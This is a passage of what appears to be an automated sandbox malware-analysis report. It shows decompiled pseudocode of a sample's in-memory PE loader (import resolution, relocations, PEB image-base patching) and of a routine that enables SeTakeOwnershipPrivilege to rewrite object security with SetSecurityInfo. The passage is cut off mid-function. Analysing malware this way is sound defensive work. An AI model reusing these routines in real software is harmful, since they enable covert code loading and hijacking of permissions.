    										_t347 = NtQueryInformationProcess(_v12, 0, _v52, _v8, 0); // executed
    										_v44 = _t347;
    									}
    									if(_v44 == 0xc0000004) {
    										continue;
    									} else {
    										if(_v44 >= 0) {
    											 *((intOrPtr*)( *((intOrPtr*)(_v52 + 4)) + 8)) = _v24;
    											_v48 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v52 + 4)) + 0xc)) + 0xc));
    											 *((intOrPtr*)(_v48 + 0x18)) = _v24;
    											_v28 = _v24 +  *((intOrPtr*)(_v72 + 0x28));
    											 *_v20 = 0x5a4d;
    											E00401127(_v72, _v20, _t552, _t555, _t556);
    											_v28(0x10, _v20,  *((intOrPtr*)(_v72 + 0x54)), 2);
    											_v40 = 1;
    										}
    										goto L82;
    									}
    								}
    								goto L82;
    							}
    							while( *_v32 != 0 ||  *((intOrPtr*)(_v32 + 0x10)) != 0 ||  *((intOrPtr*)(_v32 + 8)) != 0 ||  *((intOrPtr*)(_v32 + 0xc)) != 0 ||  *_v32 != 0 ||  *((intOrPtr*)(_v32 + 4)) != 0) {
    								_v104 = _v104 & 0x00000000;
    								_v116 = _v116 & 0x00000000;
    								_v120 = _v120 & 0x00000000;
    								_v112 = _v112 & 0x00000000;
    								_v108 = _v108 & 0x00000000;
    								if( *((intOrPtr*)(_v32 + 0xc)) != 0) {
    									_push( *((intOrPtr*)(_v32 + 0xc)));
    									_push(_a4);
    									_t399 = E00401127(_v32, _t508, _t552, _t555, _t556);
    									_t524 = 0xc;
    									_t400 = LoadLibraryA(_t399); // executed
    									_v104 = _t400;
    									if(_v104 != 0) {
    										_push( *_v32);
    										_push(_a4);
    										_push(0xc);
    										_v116 = E00401127(_v32, _t524, _t552, _t555, _t556);
    										_t508 = _v24 +  *((intOrPtr*)(_v32 + 0x10));
    										_v120 = _v24 +  *((intOrPtr*)(_v32 + 0x10));
    										while( *_v116 != 0) {
    											if(( *_v116 & 0x80000000) == 0) {
    												_push( *_v116);
    												_push(_a4);
    												_push(0xc);
    												_v112 = E00401127(_v116, _t508, _t552, _t555, _t556);
    												_v108 = GetProcAddress(_v104, _v112 + 2);
    											} else {
    												_v108 = GetProcAddress(_v104,  *_v116 & 0x0000ffff);
    											}
    											if(_v108 != 0) {
    												_t508 = _v108;
    												 *_v120 = _v108;
    												_v116 = _v116 + 4;
    												_v120 = _v120 + 4;
    												continue;
    											} else {
    												goto L82;
    											}
    										}
    										_v32 = _v32 + 0x14;
    										continue;
    									}
    									goto L82;
    								}
    							}
    							goto L49;
    						}
    						_push( *((intOrPtr*)(_v72 + 0xa0)));
    						_push(_a4);
    						_t431 = E00401127(_v72, _t506, _t552, _t555, _t556);
    						_t506 = 0xc;
    						_v36 = _t431;
    						if(_v36 == _a4) {
    							goto L29;
    						}
    						while( *_v36 != 0) {
    							_v100 =  *((intOrPtr*)(_v36 + 4)) - 8 >> 1;
    							_v92 = _v92 & 0x00000000;
    							_v88 = _v88 & 0x00000000;
    							_v84 = _v84 & 0x00000000;
    							_v80 = _v80 & 0x00000000;
    							_v96 = _v36 + 8;
    							while(1) {
    								_v100 = _v100 - 1;
    								if(_v100 <= 0) {
    									break;
    								}
    								if(( *_v96 & 0x0000ffff) >> 0xc != 3) {
    									if(( *_v96 & 0x0000ffff) >> 0xc == 0xa) {
    										_v92 = ( *_v96 & 0xfff) +  *_v36;
    										_push(_v92);
    										_push(_a4);
    										_push(0xc);
    										_t455 = E00401127(( *_v96 & 0xfff) +  *_v36, _v36, _t552, _t555, _t556);
    										asm("cdq");
    										_v84 =  *_t455 & 0x000000ff;
    										_v80 = _t552;
    										asm("adc ecx, [ebp-0x4c]");
    										_v84 = _v16 + _v84;
    										_v80 = 0;
    										_t460 = _v24 + _v92;
    										 *_t460 = _v84;
    										_t460[1] = _v80;
    									}
    								} else {
    									_v92 = ( *_v96 & 0xfff) +  *_v36;
    									_push(_v92);
    									_push(_a4);
    									_push(0xc);
    									_v88 =  *((intOrPtr*)(E00401127(( *_v96 & 0xfff) +  *_v36, _v36, _t552, _t555, _t556)));
    									_v88 = _v88 + _v16;
    									 *(_v24 + _v92) = _v88;
    								}
    								_v96 =  &(_v96[1]);
    							}
    							_t441 = _v36;
    							_t506 = _v36 +  *((intOrPtr*)(_t441 + 4));
    							_v36 = _v36 +  *((intOrPtr*)(_t441 + 4));
    						}
    						goto L29;
    					}
    					goto L82;
    				}
    				if(( *(_v72 + 0x16) & 1) == 0) {
    					_push(0x40);
    					_push(0);
    					_push( *((intOrPtr*)(_v72 + 0x50)));
    					_push(0x1a);
    					_t501 = E00401127(_v72, _t503, __edx, _t555, _t556);
    					_t558 = _t558 + 0xc;
    					_v24 = _t501;
    					if(_v24 != 0) {
    						goto L5;
    					} else {
    						goto L82;
    					}
    				} else {
    					goto L82;
    				}
    			}

    APIs
    • GetCurrentProcess.KERNEL32(?,00000040), ref: 00437C54
    • LoadLibraryA.KERNEL32(00000000), ref: 00437F66
    • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,00000004,?,00000040), ref: 00437FC1
    • GetProcAddress.KERNEL32(00000000,00000002,00000000,00000000,?,?,?,?,?,00000004,?,00000040), ref: 00437FE9
    • NtQueryInformationProcess.NTDLL(?,00000000,00000000,00000018,00000000), ref: 00438198
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939837512.00437000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12939683280.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12939691555.00401000.00000040.sdmp
    • Associated: 00000002.00000002.12939699131.00402000.00000080.sdmp
    • Associated: 00000002.00000002.12939738500.0041D000.00000040.sdmp
    • Associated: 00000002.00000002.12939827664.00436000.00000080.sdmp
    • Associated: 00000002.00000002.12939850458.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 63%
    			E003C80A0(intOrPtr _a4, intOrPtr _a8) {
    				char _v8;
    				char _v12;
    				char _v16;
    				void* _v20;
    				short _v24;
    				char _v28;
    				short _v32;
    				char _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				int _v48;
    				int _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				intOrPtr _v76;
    				int _v80;
    				int _v92;
    				intOrPtr _v96;
    				void _v100;
    				intOrPtr _t63;
    				intOrPtr _t64;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				intOrPtr _t71;
    				intOrPtr _t74;
    				void* _t82;
    				intOrPtr _t83;
    				void* _t88;
    				void* _t90;
    				void* _t93;
    				intOrPtr _t94;
    				void* _t95;
    				intOrPtr _t98;
    				intOrPtr _t100;
    				intOrPtr _t104;
    				intOrPtr _t109;
    				intOrPtr _t113;
    				intOrPtr _t114;
    				intOrPtr _t116;
    				intOrPtr _t122;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t113 =  *0x3e8628; // 0x622508
    				_push( &_v20);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(1);
    				_v16 = 0;
    				_v8 = 0;
    				_v20 = 0;
    				_v12 = 0;
    				_v28 = 0;
    				_v24 = 0x100;
    				_v36 = 0;
    				_v32 = 0x500;
    				_push( &_v28);
    				if( *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x158))))() == 0) {
    					L11:
    					_t114 =  *0x3e8628; // 0x622508
    					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x30))))();
    				} else {
    					_t74 =  *0x3e8628; // 0x622508
    					_push( &_v8);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0x220);
    					_push(0x20);
    					_push(2);
    					_push( &_v36);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t74 + 0x158))))() == 0) {
    						goto L11;
    					} else {
    						memset( &_v100, 0, 0x40);
    						_v72 = _v20;
    						_v40 = _v8;
    						_t104 =  *0x3e8628; // 0x622508
    						_v100 = 0x80000000;
    						_v96 = 2;
    						_v92 = 0;
    						_v80 = 0;
    						_v76 = 5;
    						_v68 = 0x10000000;
    						_v64 = 2;
    						_v60 = 0;
    						_v48 = 0;
    						_v44 = 2;
    						_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x1b0))))(2,  &_v100, 0,  &_v12);
    						if(_t128 != 0) {
    							L10:
    							if(_t128 == 0xffffffff) {
    								goto L11;
    							}
    						} else {
    							_t127 = _a8;
    							_t122 =  *0x3e8628; // 0x622508
    							_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x1a8))))(_a4, _t127, 4, 0, 0, _v12, 0); // executed
    							_t128 = _t82;
    							if(_t128 == 0 || _t128 != 5) {
    								goto L10;
    							} else {
    								_t83 =  *0x3e8628; // 0x622508
    								_t39 = _t83 + 0x150; // 0x622658
    								_push( *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x100))))(0x20,  &_v16));
    								if( *((intOrPtr*)( *_t39))() == 0) {
    									goto L11;
    								} else {
    									_t88 = E003E1FF0(1, L"SeTakeOwnershipPrivilege", _v16); // executed
    									if(_t88 == 0) {
    										goto L11;
    									} else {
    										_t109 =  *0x3e8628; // 0x622508
    										_t90 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x1a8))))(_a4, _t127, 1, _v8, 0, 0, 0); // executed
    										_t128 = _t90;
    										if(_t128 != 0) {
    											goto L10;
    										} else {
    											_t93 = E003E1FF0(0, L"SeTakeOwnershipPrivilege", _v16); // executed
    											if(_t93 == 0) {
    												goto L11;
    											} else {
    												_t94 =  *0x3e8628; // 0x622508
    												_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x1a8))))(_a4, _t127, 4, 0, 0, _v12, 0); // executed
    												_t128 = _t95;
    												goto L10;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				_t63 = _v8;
    				if(_t63 != 0) {
    					_t100 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x154))))(_t63);
    				}
    				_t64 = _v20;
    				if(_t64 != 0) {
    					_t71 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x154))))(_t64);
    				}
    				_t65 = _v12;
    				if(_t65 != 0) {
    					_t116 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x9c))))(_t65);
    				}
    				_t66 = _v16;
    				if(_t66 != 0) {
    					_t98 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t98 + 0xf8))))(_t66);
    				}
    				return _t128;
    			}

    APIs
    • memset.MSVCRT ref: 003C8128
    • SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 003C81A5
      • Part of subcall function 003E1FF0: AdjustTokenPrivileges.KERNELBASE(003C81ED,00000000,?,00000010,00000000,00000000), ref: 003E2052
    • SetSecurityInfo.ADVAPI32(?,?,00000001,?,00000000,00000000,00000000), ref: 003C820E
    • SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 003C8246
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 76%
    			E003E1FF0(signed int __eax, void* __ecx, void* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				struct _TOKEN_PRIVILEGES _v28;
    				int _t21;
    				intOrPtr _t28;
    				intOrPtr _t31;
    
    				_t31 =  *0x3e8628; // 0x622508
    				_push( &_v12);
    				_push(0);
    				if( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x188))))() != 0) {
    					asm("sbb esi, esi");
    					_v28.Privileges = _v12;
    					_v20 = _v8;
    					_v28.PrivilegeCount = 1;
    					_v16 =  ~__eax & 0x00000002;
    					_t21 = AdjustTokenPrivileges(_a4, 0,  &_v28, 0x10, 0, 0); // executed
    					if(_t21 == 0) {
    						goto L1;
    					} else {
    						_t28 =  *0x3e8628; // 0x622508
    						return 0 |  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x30))))() != 0x00000514;
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}

    APIs
    • AdjustTokenPrivileges.KERNELBASE(003C81ED,00000000,?,00000010,00000000,00000000), ref: 003E2052
    Strings
    • SeTakeOwnershipPrivilege, xrefs: 003E2009
    C-Code - Quality: 100%
    			E003CE850(intOrPtr* __ecx) {
    				void* _t4;
    				intOrPtr _t8;
    				intOrPtr _t13;
    				intOrPtr* _t14;
    				intOrPtr* _t15;
    
    				_t15 = __ecx;
    				_t14 = __ecx + 4;
    				 *_t14 = 0;
    				 *__ecx = 0;
    				_t4 = E003C36C0();
    				if(_t4 != 0) {
    					_t13 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t13 + 0x1c4))))(0x3e638c, 0, 1, 0x3e617c, _t14); // executed
    					return _t15;
    				} else {
    					_t8 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t8 + 0x1c4))))(0x3e614c, _t4, 1, 0x3e612c, _t15);
    					return _t15;
    				}
    			}








    APIs
    • CoCreateInstance.OLE32(003E638C,00000000,00000001,003E617C,?), ref: 003CE8A7
    C-Code - Quality: 100%
    			E003C952C() {
    
    				SetUnhandledExceptionFilter(E003CBB6D); // executed
    				return 0;
    			}



    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_0000BB6D), ref: 003C9531

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 46 3c3d50-3c3d54 47 3c3d5b 46->47 48 3c3d56 46->48 49 3c61e0-3c6276 47->49 48->49 51 3c627c-3c628f 49->51 52 3c65ae-3c65b3 49->52 51->52 58 3c6295-3c62b5 call 3c8030 call 3c32c0 51->58 53 3c65bd-3c65c2 52->53 54 3c65b5-3c65b8 52->54 55 3c65cc-3c65d1 53->55 56 3c65c4-3c65c9 53->56 54->53 59 3c65dc-3c65e5 55->59 60 3c65d3-3c65d9 call 3cbb40 55->60 56->55 67 3c62c7-3c62d7 call 3c5bd0 58->67 68 3c62b7-3c62c2 call 3e0580 58->68 60->59 67->52 73 3c62dd-3c6371 call 3c9090 * 2 VariantInit * 2 call 3e0290 call 3c13c0 67->73 68->52 82 3c637a 73->82 83 3c6373-3c6378 73->83 84 3c6381-3c6394 call 3c13c0 82->84 83->84 87 3c639d 84->87 88 3c6396-3c639b 84->88 89 3c63a4-3c643c call 3c7cf0 * 2 VariantClear * 3 87->89 88->89 95 3c65a2 call 3c6d30 89->95 96 3c6442-3c6448 89->96 100 3c65a7-3c65a9 95->100 96->52 97 3c644e-3c645e call 3c5bd0 96->97 97->52 103 3c6464-3c64df call 3c9090 VariantInit * 3 call 3c13c0 97->103 100->52 102 3c65ab 100->102 102->52 108 3c64e8 103->108 109 3c64e1-3c64e6 103->109 110 3c64ef-3c6502 call 3c13c0 108->110 109->110 113 3c650b 110->113 114 3c6504-3c6509 110->114 115 3c6512-3c65a0 call 3c7cf0 * 2 VariantClear * 3 113->115 114->115 115->52
    C-Code - Quality: 72%
    			E003C3D50(intOrPtr* __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				short _v22;
    				char* _v24;
    				intOrPtr _v26;
    				void* _v28;
    				intOrPtr _v30;
    				void* _v32;
    				intOrPtr _v34;
    				char _v36;
    				char _v40;
    				void* _v44;
    				void* _v48;
    				void* _v52;
    				char _v56;
    				intOrPtr* _v60;
    				void* _v64;
    				void* _v68;
    				void* _v72;
    				short _v74;
    				void* _v76;
    				void _v80;
    				char* _v84;
    				char _v88;
    				char* _v92;
    				intOrPtr* _v96;
    				void* _v100;
    				char _v104;
    				char* _v108;
    				intOrPtr* _v112;
    				char* _v116;
    				char _v120;
    				intOrPtr* _v124;
    				char* _v128;
    				char* _v132;
    				char _v136;
    				char _v280;
    				char _v336;
    				char _v536;
    				void* __ebx;
    				void* __edi;
    				intOrPtr* __esi;
    				intOrPtr* __ebp;
    				intOrPtr* _t239;
    				void* _t241;
    				intOrPtr* _t243;
    				intOrPtr* _t244;
    				intOrPtr* _t245;
    				intOrPtr* _t246;
    				intOrPtr* _t256;
    				intOrPtr* _t260;
    				intOrPtr* _t261;
    				intOrPtr* _t262;
    				intOrPtr* _t264;
    				intOrPtr* _t268;
    				intOrPtr* _t270;
    				intOrPtr* _t271;
    				intOrPtr* _t272;
    				intOrPtr* _t273;
    				intOrPtr* _t275;
    				intOrPtr* _t276;
    				intOrPtr* _t277;
    				intOrPtr* _t278;
    				intOrPtr* _t280;
    				intOrPtr* _t281;
    				void* _t283;
    				intOrPtr* _t284;
    				intOrPtr _t292;
    				void* _t329;
    				void* _t333;
    				intOrPtr* _t334;
    				void* _t338;
    				void* _t342;
    				void* _t344;
    				void* _t345;
    
    				_t349 =  *((intOrPtr*)(__ecx + 4));
    				if( *((intOrPtr*)(__ecx + 4)) == 0) {
    					_t334 = __ecx;
    					_v8 = 0;
    					_v16 = 0;
    					_v20 = 0;
    					_v24 = 0;
    					_v12 = 0;
    					_t284 = 0;
    					_v28 = 0;
    					E003C9090(_t349,  &_v280, 0x24);
    					_t239 =  *_t334;
    					_t344 = _t342 - 0x114 + 8;
    					_t241 =  *((intOrPtr*)( *((intOrPtr*)( *_t239 + 0x20))))(_t239,  &_v280, 0x3e613c, 0x3e611c,  &_v8, _t329, _t333, _t283, _t338);
    					if(_t241 >= 0) {
    						E003C8030( &_v12);
    						_t345 = _t344 + 4;
    						__eflags = _v12;
    						if(_v12 != 0) {
    							_v28 = 0x101;
    							_t284 = E003D1D90(0x202, 0);
    							_t345 = _t345 + 8;
    							__eflags = _t284;
    							if(_t284 != 0) {
    								_t292 =  *0x3e8628; // 0x622508
    								 *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x138))))(_t284,  &_v28);
    								_t256 = _v8;
    								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t256 + 0x80))))(_t256, _v12);
    								if(__eflags >= 0) {
    									E003C9090(__eflags,  &_v280, 0x14);
    									_t260 = _v8;
    									_t345 = _t345 + 8;
    									_t261 =  *((intOrPtr*)( *((intOrPtr*)( *_t260 + 0x50))))(_t260,  &_v280);
    									__eflags = _t261;
    									if(_t261 >= 0) {
    										_t262 = _v8;
    										_t264 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0xc))))(_t262,  &_v32,  &_v20);
    										__eflags = _t264;
    										if(_t264 >= 0) {
    											memset( &_v80, 0, 0x30);
    											_v80 = 0x30;
    											_v76 = 0x7e1;
    											_v72 = 1;
    											_v44 = 1;
    											_t268 = _v20;
    											_t345 = _t345 + 0xc;
    											_v74 = 1;
    											_v60 = 0x5a0;
    											_v56 = 1;
    											_v48 = 1;
    											_t270 =  *((intOrPtr*)( *((intOrPtr*)( *_t268 + 0xc))))(_t268,  &_v80);
    											__eflags = _t270;
    											if(_t270 >= 0) {
    												_t271 = _v8;
    												_t272 =  *((intOrPtr*)( *((intOrPtr*)( *_t271 + 0x78))))(_t271, 0x3e32c0, 0);
    												__eflags = _t272 - 0x80070005;
    												if(_t272 == 0x80070005) {
    													_t281 = _v8;
    													_t272 =  *((intOrPtr*)( *((intOrPtr*)( *_t281 + 0x78))))(_t281, _t284, 0);
    												}
    												__eflags = _t272;
    												if(_t272 >= 0) {
    													_t273 = _v8;
    													_t275 =  *((intOrPtr*)( *((intOrPtr*)( *_t273))))(_t273, 0x3e60a0,  &_v16);
    													__eflags = _t275;
    													if(_t275 >= 0) {
    														_t276 = _v16;
    														_t277 =  *((intOrPtr*)( *((intOrPtr*)( *_t276 + 0x18))))(_t276, 0, 1);
    														__eflags = _t277 - 0x80070005;
    														if(_t277 == 0x80070005) {
    															_t278 = _v8;
    															 *((intOrPtr*)( *((intOrPtr*)( *_t278 + 0x78))))(_t278, _t284, 0);
    															_t280 = _v16;
    															_t277 =  *((intOrPtr*)( *((intOrPtr*)( *_t280 + 0x18))))(_t280, 0, 1);
    														}
    														__eflags = _t277;
    														if(_t277 >= 0) {
    															_v24 = 1;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						_t243 = _v20;
    						__eflags = _t243;
    						if(_t243 != 0) {
    							 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 8))))(_t243);
    						}
    						_t244 = _v8;
    						__eflags = _t244;
    						if(_t244 != 0) {
    							 *((intOrPtr*)( *((intOrPtr*)( *_t244 + 8))))(_t244);
    						}
    						_t245 = _v16;
    						__eflags = _t245;
    						if(_t245 != 0) {
    							 *((intOrPtr*)( *((intOrPtr*)( *_t245 + 8))))(_t245);
    						}
    						_t246 = _v12;
    						__eflags = _t246;
    						if(_t246 != 0) {
    							E003CBB40(_t246);
    							_t345 = _t345 + 4;
    						}
    						__eflags = _t284;
    						if(_t284 != 0) {
    							E003CBB40(_t284);
    						}
    						return _v24;
    					} else {
    						return 0 | _t241 == 0x80070050;
    					}
    				} else {
    					__ebp = __esp;
    					__esp = __esp - 0x214;
    					__eax = 0;
    					_v20 = 0;
    					_v48 = 0;
    					_v34 = 0;
    					_v30 = 0;
    					_v26 = 0;
    					__esi = _v28;
    					_v52 = 0;
    					_v22 = __ax;
    					__edi = _v24;
    					_v8 = __ecx;
    					__ebx =  *__ecx;
    					_v16 = 0;
    					__esp = __esp - 0x10;
    					__eax = __esp;
    					__edx = 0;
    					_v36 = __dx;
    					__ecx = _v36;
    					__edx = _v32;
    					 *__eax = __ecx;
    					 *((intOrPtr*)(__eax + 4)) = __edx;
    					 *((intOrPtr*)(__eax + 8)) = __esi;
    					 *((intOrPtr*)(__eax + 0xc)) = __edi;
    					__esp = __esp - 0x10;
    					__eax = __esp;
    					 *__eax = __ecx;
    					 *((intOrPtr*)(__eax + 4)) = __edx;
    					 *((intOrPtr*)(__eax + 8)) = __esi;
    					 *((intOrPtr*)(__eax + 0xc)) = __edi;
    					__esp = __esp - 0x10;
    					__eax = __esp;
    					 *__eax = __ecx;
    					 *((intOrPtr*)(__eax + 4)) = __edx;
    					 *((intOrPtr*)(__eax + 8)) = __esi;
    					 *((intOrPtr*)(__eax + 0xc)) = __edi;
    					__esp = __esp - 0x10;
    					__eax = __esp;
    					 *__eax = __ecx;
    					 *((intOrPtr*)(__eax + 4)) = __edx;
    					 *((intOrPtr*)(__eax + 8)) = __esi;
    					__esi = _v8;
    					 *((intOrPtr*)(__eax + 0xc)) = __edi;
    					_t91 = __esi + 4; // 0xe8fc4d8d
    					__eax =  *_t91;
    					__eax =  *((intOrPtr*)(__ebx + 0x28));
    					_v44 = 1;
    					__eax =  *( *((intOrPtr*)(__ebx + 0x28)))( *_t91, __edi, __esi, __ebx, __ebp); // executed
    					__eflags = __eax;
    					if(__eax >= 0) {
    						_t94 = __esi + 4; // 0xe8fc4d8d
    						__eax =  *_t94;
    						__ecx =  *__eax;
    						__edx =  &_v20;
    						__eax =  *((intOrPtr*)(__ecx + 0x1c));
    						__eax =  *( *((intOrPtr*)(__ecx + 0x1c)))(__eax, 0,  &_v20);
    						__eflags = __eax;
    						if(__eax >= 0) {
    							__ecx =  &_v52;
    							__eax = E003C8030( &_v52);
    							__edx = _v52;
    							_v20 = E003C32C0(_v20, _v52);
    							__eflags =  *0x3e8580;
    							if(__eflags == 0) {
    								__edx =  &_v16;
    								__eax = E003C5BD0( &_v16, 1); // executed
    								__eflags = __eax;
    								if(__eflags != 0) {
    									 &_v536 = E003C9090(__eflags,  &_v536, 0x15);
    									__ecx =  &_v336;
    									__eax = E003C9090(__eflags,  &_v336, 0x24);
    									__edi = __imp__#8;
    									__edx =  &_v104;
    									 *__edi( &_v104) = _v96;
    									__ecx = _v92;
    									__esi = _v104;
    									__ebx = _v100;
    									__edx =  &_v88;
    									_v112 = _v96;
    									_v108 = _v92;
    									__eax =  *__edi( &_v88);
    									__ecx = _v84;
    									__eax = _v88;
    									__edx = _v80;
    									_v32 = _v84;
    									__ecx =  &_v536;
    									_v36 = _v88;
    									__eax = _v76;
    									__ecx =  &_v136;
    									_v28 = _v80;
    									_v24 = _v76;
    									__eax = E003E0290( &_v136,  &_v536);
    									__ecx =  *((intOrPtr*)(__eax + 4));
    									__edx =  *__eax;
    									_v68 =  *((intOrPtr*)(__eax + 4));
    									__ecx = _v16;
    									_v72 =  *__eax;
    									__edx =  *((intOrPtr*)(__eax + 8));
    									__eax =  *((intOrPtr*)(__eax + 0xc));
    									__ecx =  &_v40;
    									_v64 = __edx;
    									_v60 = __eax;
    									__eax = E003C13C0(__eax,  &_v40, __edi, _v16);
    									__eax =  *__eax;
    									__eflags = __eax;
    									if(__eax == 0) {
    										_v12 = 0;
    									} else {
    										__edx =  *__eax;
    										_v12 =  *__eax;
    									}
    									__eax =  &_v336;
    									__ecx =  &_v56;
    									__eax = E003C13C0( &_v336,  &_v56, __edi,  &_v336);
    									__eax =  *__eax;
    									__eflags = __eax;
    									if(__eax == 0) {
    										_v8 = 0;
    									} else {
    										__ecx =  *__eax;
    										_v8 =  *__eax;
    									}
    									__eax =  &_v48;
    									__esp = __esp - 0x10;
    									__eax = __esp;
    									 *__eax = __esi;
    									__esi = _v112;
    									 *((intOrPtr*)(__eax + 4)) = __ebx;
    									 *((intOrPtr*)(__eax + 8)) = _v112;
    									__esi = _v108;
    									 *((intOrPtr*)(__eax + 0xc)) = _v108;
    									__esi = _v36;
    									__esp = __esp - 0x10;
    									__eax = __esp;
    									 *__eax = _v36;
    									__esi = _v32;
    									 *((intOrPtr*)(__eax + 4)) = _v32;
    									__esi = _v28;
    									__ecx = _v20;
    									 *((intOrPtr*)(__eax + 8)) = _v28;
    									__esi = _v24;
    									__edx =  *__ecx;
    									 *((intOrPtr*)(__eax + 0xc)) = _v24;
    									__esi = _v72;
    									__esp = __esp - 0x10;
    									__eax = __esp;
    									 *__eax = _v72;
    									__esi = _v68;
    									 *((intOrPtr*)(__eax + 4)) = _v68;
    									__esi = _v64;
    									 *((intOrPtr*)(__eax + 8)) = _v64;
    									__esi = _v60;
    									 *((intOrPtr*)(__eax + 0xc)) = _v60;
    									__eax = _v12;
    									__eax = _v8;
    									__ecx =  *((intOrPtr*)(__edx + 0x40));
    									__eax =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0x40))))(__ecx, _v8, _v12, 6, 5,  &_v48);
    									__ecx =  &_v56;
    									__ebx = _v8;
    									__eax = E003C7CF0( &_v56);
    									__ecx =  &_v40;
    									__eax = E003C7CF0( &_v40);
    									__esi = __imp__#9;
    									__edx =  &_v136;
    									 *__esi( &_v136) =  &_v88;
    									__eax =  *__esi( &_v88);
    									__ecx =  &_v104;
    									__eax =  *__esi( &_v104);
    									__eflags = __ebx;
    									if(__ebx >= 0) {
    										__eax = E003C6D30(); // executed
    										__eflags = __eax;
    										if(__eax == 0) {
    											_v44 = __eax;
    										}
    									} else {
    										__eflags = __ebx - 0x80070005;
    										if(__ebx == 0x80070005) {
    											__edx =  &_v16;
    											__eflags = E003C5BD0( &_v16, 0);
    											if(__eflags != 0) {
    												 &_v336 = E003C9090(__eflags,  &_v336, 0x24);
    												__ecx =  &_v120;
    												__eax =  *__edi( &_v120);
    												__edx = _v116;
    												__eax = _v112;
    												__ecx = _v108;
    												__ebx = _v120;
    												_v100 = _v116;
    												__edx =  &_v136;
    												_v96 = _v112;
    												_v92 = _v108;
    												__eax =  *__edi( &_v136);
    												__ecx = _v132;
    												__eax = _v136;
    												__edx = _v128;
    												_v68 = _v132;
    												_v72 = _v136;
    												__eax = _v124;
    												__ecx =  &_v36;
    												_v64 = _v128;
    												_v60 = _v124;
    												__eax =  *__edi( &_v36);
    												__edx = _v32;
    												__ecx = _v24;
    												__eax = _v28;
    												__edi = _v36;
    												_v84 = _v32;
    												__edx = _v16;
    												_v76 = _v24;
    												__ecx =  &_v56;
    												_v80 = __eax;
    												__eax = E003C13C0(__eax,  &_v56, __edi, _v16);
    												__eax =  *__eax;
    												__eflags = __eax;
    												if(__eax == 0) {
    													_v8 = 0;
    												} else {
    													__eax =  *__eax;
    													_v8 = __eax;
    												}
    												__ecx =  &_v336;
    												__ecx =  &_v40;
    												__eax = E003C13C0(__eax,  &_v40, __edi,  &_v336);
    												__eax =  *__eax;
    												__eflags = __eax;
    												if(__eax == 0) {
    													_v12 = 0;
    												} else {
    													__edx =  *__eax;
    													_v12 =  *__eax;
    												}
    												__eax =  &_v48;
    												__esp = __esp - 0x10;
    												__eax = __esp;
    												 *__eax = __ebx;
    												__ebx = _v100;
    												 *((intOrPtr*)(__eax + 4)) = _v100;
    												__ebx = _v96;
    												 *((intOrPtr*)(__eax + 8)) = _v96;
    												__ebx = _v92;
    												 *((intOrPtr*)(__eax + 0xc)) = _v92;
    												__ebx = _v72;
    												__esp = __esp - 0x10;
    												__eax = __esp;
    												 *__eax = _v72;
    												__ebx = _v68;
    												__ecx = _v20;
    												 *((intOrPtr*)(__eax + 4)) = _v68;
    												__ebx = _v64;
    												__edx =  *__ecx;
    												 *((intOrPtr*)(__eax + 8)) = _v64;
    												__ebx = _v60;
    												 *((intOrPtr*)(__eax + 0xc)) = _v60;
    												__esp = __esp - 0x10;
    												__eax = __esp;
